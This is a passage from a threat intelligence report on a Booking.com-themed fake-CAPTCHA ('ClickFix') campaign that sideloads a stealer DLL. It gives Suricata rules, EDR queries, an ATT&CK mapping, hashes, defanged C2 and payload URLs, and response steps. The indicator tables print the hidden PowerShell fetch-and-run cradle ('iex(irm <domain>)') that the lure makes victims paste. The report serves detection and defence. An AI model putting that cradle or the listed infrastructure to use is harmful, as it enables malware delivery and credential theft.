    condition:
        $zip at 0 and $psl_exe and $libpsl and $msys and $libiconv
}
```
Suricata Rules
C2 and distribution domain detection. Two caveats: the DNS rules match the registered name as a substring, so they also fire on any subdomain (intended here); and the two `http.uri` rules only see the URI when the session is plaintext or TLS is terminated in front of the sensor. The ZIP is served over HTTPS, so on an untapped link pair them with `tls.sni` matches on the same domains:
```suricata
# PS1 dropper C2 domain lookups
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix C2 DNS - solimayticontexta.com"; dns.query; content:"solimayticontexta"; nocase; sid:2026031001; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix C2 DNS - wiosyrondaty.com"; dns.query; content:"wiosyrondaty"; nocase; sid:2026031002; rev:1;)
# Distribution domain lookups
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix Distribution DNS - sabrineme.com"; dns.query; content:"sabrineme"; nocase; sid:2026031003; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix Distribution DNS - hailmeinc.com"; dns.query; content:"hailmeinc"; nocase; sid:2026031004; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix Distribution DNS - asmweosiqsaaw.com"; dns.query; content:"asmweosiqsaaw"; nocase; sid:2026031005; rev:1;)
# Booking typosquat domains
alert dns $HOME_NET any -> any 53 (msg:"BREAKGLASS ClickFix Booking Typosquat - bklmain"; dns.query; content:"bklmain"; nocase; sid:2026031006; rev:1;)
# C2 IP -- block all traffic to Crimean BPH
alert ip $HOME_NET any -> 109.107.161.194 any (msg:"BREAKGLASS ClickFix C2 IP - landvps Crimea BPH"; sid:2026031008; rev:1;)
# ZIP payload downloads (plaintext HTTP or decrypted TLS only)
alert http $HOME_NET any -> any any (msg:"BREAKGLASS ClickFix Payload - asfixsoftwaredev.zip"; flow:to_server,established; http.uri; content:"/asfixsoftwaredev.zip"; sid:2026031011; rev:1;)
alert http $HOME_NET any -> any any (msg:"BREAKGLASS ClickFix Payload - bkmsiqop.zip"; flow:to_server,established; http.uri; content:"/bkmsiqop.zip"; sid:2026031012; rev:1;)
# Known BPH range
alert ip $HOME_NET any -> 109.107.161.0/24 any (msg:"BREAKGLASS Traffic to NHT-MNT/landvps.online Range (Known BPH)"; sid:2026031015; rev:1;)
```
Endpoint Detection Queries
PowerShell execution with ClickFix flags (EDR/SIEM). Note that powershell.exe accepts any unambiguous prefix of a parameter name or enum value, so `-W H -EP B` is only the shortest spelling of `-WindowStyle Hidden -ExecutionPolicy Bypass`; a literal match on the abbreviated form misses `-w hidden`, `-win h` or `-ep bypass`, and the cradle can swap `irm` for `iwr` or `Invoke-WebRequest`. Treat the query below as the narrow form and widen it for your platform:
process_name:"powershell.exe" AND command_line:("-W H" AND "-EP B" AND "iex" AND "irm")
DLL sideloading via psl.exe:
process_name:"psl.exe" AND loaded_dll:"libpsl-5.dll" AND dll_size:>15000000
Temp directory DLL creation:
file_path:"%TEMP%\\*.dll" AND file_name_length:36 AND file_extension:"dll"
Behavioral Indicators
| Indicator Type | Value |
|---|---|
| PowerShell pattern | powershell -W H -EP B -c iex(irm <domain>) |
| DLL sideloading | psl.exe loading libpsl-5.dll with randomized export names |
| Temp DLL creation | %TEMP%\<32-char-hex>.dll with DllMain export |
| JARM (C2) | 2ad2ad0002ad2ad00042d42d0000005d86ccb1a0567e012264097a0315d7a7 |
| JARM (sabrineme) | 29d29d00029d29d00042d43d00041d598ac0c1012db967bb1ad0ff2491b3ae |
MITRE ATT&CK Mapping
| Tactic | Technique | ID | How It Applies |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Link | T1566.002 | Booking.com-themed phishing link delivers victim to fake CAPTCHA |
| Execution | User Execution: Malicious Copy and Paste | T1204.004 | Victim clicks the checkbox, then pastes the clipboard command into the Run dialog |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | powershell -W H -EP B -c iex(irm ...) |
| Defense Evasion | Hijack Execution Flow: DLL Side-Loading | T1574.002 | psl.exe loads trojanized libpsl-5.dll from its own directory; no persistence mechanism is described in the samples |
| Defense Evasion | Obfuscated Files or Information | T1027 | NativeAOT compilation, randomized PE metadata, obfuscated exports |
| Defense Evasion | Masquerading: Match Legitimate Name | T1036.005 | Malicious DLL named libpsl-5.dll to match legitimate MSYS2 library |
| Defense Evasion | Virtualization/Sandbox Evasion | T1497 | Geofenced C2 responses, divergent sandbox results (Yomi vs Zenbox) |
| Credential Access | Credentials from Web Browsers | T1555.003 | Stealer indicators: cookie references, browser data extraction |
| Collection | Screen Capture | T1113 | ImageSharp library embedded for screenshot capture |
| Command and Control | Web Protocols | T1071.001 | HTTPS C2 communication via nginx |
| Command and Control | Encrypted Channel: Asymmetric Cryptography | T1573.002 | TLS 1.3 to the C2 (certificate-based key exchange; AES-256-GCM record encryption) |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Stolen data sent via MessagePack-serialized HTTPS |
| Resource Development | Acquire Infrastructure: Domains | T1583.001 | 8+ purpose-registered domains: two dropper domains via Hello Internet Corp, eight bklmain.* typosquats across eight TLDs, plus the three distribution domains |
Indicators of Compromise
File Indicators
| Artifact | SHA256 | Type |
|---|---|---|
| libpsl-5.dll (trojanized) | 08887f949d9a15dba1d89e4a0a4e37435856cd0de5f3d739f1fad40382bed71b | PE32+ DLL (x64), 23.4MB |
| asfixsoftwaredev.zip | 695af1fa1e6492496c721f401bdcb3c4cc839f0e884158ad48c041ef895a2650 | ZIP archive, 15.4MB |
| ps1.ps1 (dropper) | 56b1db6d6aad59f2fc90d107b0d27e905528e23689757627ed0e4fd1061d0a96 | PowerShell, 55 bytes |
| fakecaptcha.html (lure) | a6d3152fe570b575337cc35d3c07adea259e41bcfd91cfbe838e55179e766aa5 | HTML, 19.6KB |
| psl.exe (legitimate) | 12c931dbfa907d4e394fb928f3a8a27ed7e5bf203578dabcd65bb2dd5f2f1280 | PE32+ EXE (x64) |
Additional hashes for the trojanized DLL:
MD5: 9f64ea9bfd8954057df175532d27088a
Imphash: c408d5c45cb005ed3b8a08b7f7ecefdd
Network Indicators -- Domains
# PS1 Dropper C2 (active)
solimayticontexta[.]com 109[.]107[.]161[.]194 LIVE
# PS1 Dropper C2 (previous wave)
wiosyrondaty[.]com (no A record) DEAD
# Payload Distribution
sabrineme[.]com 116[.]202[.]222[.]249 LIVE (payload removed)
hailmeinc[.]com 162[.]241[.]123[.]127 LIVE
asmweosiqsaaw[.]com 95[.]85[.]244[.]166 LIVE
# Booking.com Typosquats (all on 162[.]241[.]123[.]127)
bklmain[.]store
bklmain[.]club
bklmain[.]fun
bklmain[.]shop
bklmain[.]online
bklmain[.]site
bklmain[.]website
blkmain[.]xyz
Network Indicators -- IPs
109[.]107[.]161[.]194 PS1 C2 NHT-MNT/landvps.online, Crimea BPH (AS216334)
116[.]202[.]222[.]249 Payload host BigBangServers/Hetzner (host03)
203[.]161[.]33[.]166 Backup host BigBangServers (host01), MariaDB exposed on 3306
162[.]241[.]123[.]127 Distribution Unified Layer/Bluehost (AS46606)
95[.]85[.]244[.]166 Distribution ORG-NFS9-RIPE, Tajikistan
Network Indicators -- URLs
hxxps://solimayticontexta[.]com PS1 second-stage download
hxxps://sabrineme[.]com/asfixsoftwaredev.zip Payload ZIP delivery
hxxps://hailmeinc[.]com/bkmsiqop.zip Alternate payload ZIP
/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s?get_command=1 Command fetch endpoint
/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s (POST) Telegram notification endpoint
Certificate Indicators
| Domain | Serial | Issuer | Issued |
|---|---|---|---|
| solimayticontexta[.]com | 06b904bd686958aa0e1de21169cb398d6b96 | Let's Encrypt R12 | 2026-03-08 |
| sabrineme[.]com (wildcard) | 2162305041d5fcde0de7238205b8a1d8 | Google Trust Services WE1 | 2026-03-05 |
Recommended Actions
Immediate (24-48 hours):
- Block all IOC domains and IPs at network perimeter
- Search email gateway logs for Booking.com-themed phishing emails linking to identified domains
- Hunt for PowerShell execution with `-W H -EP B` flags (and their longer spellings) in EDR/SIEM
- Search for `psl.exe` execution and `libpsl-5.dll` loads in endpoint telemetry
- Check for temp directory DLLs matching pattern `%TEMP%\<32-hex>.dll`
Short-term (1-2 weeks):
- Deploy YARA rules across endpoint fleet
- Deploy Suricata rules at network sensors
- Report domains to respective registrar abuse contacts
- Share IOCs with industry ISACs and sector-specific threat sharing groups
Medium-term (1-3 months):
- Monitor for new ClickFix variants using the `psl.exe` / `libpsl-5.dll` sideloading pattern
- Set up CT log monitoring for new certificates on campaign domains
- Track NHT-MNT / landvps.online IP ranges for new C2 deployments
- Monitor Hello Internet Corp + DNSPod registrations for new dropper domains
Published by Breakglass Intelligence. Investigation conducted 2026-03-11. 1 fake CAPTCHA. 5 countries. 23 million bytes of NativeAOT betrayal. And a Telegram bot that pings every time someone falls for it. Classification: TLP:CLEAR